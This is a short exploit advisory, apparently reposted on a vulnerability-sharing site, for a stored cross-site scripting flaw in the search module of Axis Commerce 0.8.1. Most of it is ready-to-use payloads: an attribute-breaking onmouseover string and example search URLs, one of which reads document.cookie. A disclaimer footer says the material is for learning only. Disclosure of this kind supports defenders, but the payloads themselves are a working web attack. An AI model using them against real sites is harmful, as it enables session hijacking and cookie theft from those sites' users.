# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS # Date: 19.08.2011 # Author: Eyup CELIK # Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip # Version: 0.8.1 and previus # Tested on: Apache (For Windows) ISSUE Vulnerable Modules => Search Module XSS can be done using the command input Example Code: " onmouseover=prompt(XSS Code) bad=" Example: http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad=" http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论